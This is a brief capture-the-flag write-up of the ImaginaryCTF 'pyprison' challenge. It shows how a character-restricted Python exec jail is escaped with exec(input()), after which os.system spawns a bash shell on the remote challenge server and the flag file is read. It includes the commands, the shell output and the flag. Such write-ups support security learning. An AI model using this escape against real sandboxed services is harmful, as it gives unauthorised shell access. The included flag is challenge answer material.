CTFTIME

pyprison [IMAGINARY CTF] [MISC]


#python#ctftime

pyprison

Given file

#!/usr/bin/env python3

while True:
  a = input(">>> ")
  assert all(n in "()abcdefghijklmnopqrstuvwxyz" for n in a)
  print("Execing")
  exec(a)
  • We’re restricted to these constraints.
  • We can only use lowercase alphabets and parentheses
  • Here we can do anything with these chars
  • Let’s get an input and pass it to exec
  misc python3 pyprison.py
>>> exec(input())
Execing
print('Meaw Meaw')
Meaw Meaw
  • Here you can see it’s executed our input
  • Now let’s try to get a shell

in remote server

  misc nc pyprison.chal.imaginaryctf.org 1337
== proof-of-work: disabled ==
>>> exec(input())
import os; os.system('/bin/bash')
whoami
user
id
uid=1000(user) gid=1000(user) groups=1000(user)

Now read the flag

cat flag.txt
ictf{pyprison_more_like_python_as_a_service_12b19a09}

flag: ictf{pyprison_more_like_python_as_a_service_12b19a09}


Hack The Box

It would be appreciated if you give me a respect+ on HTB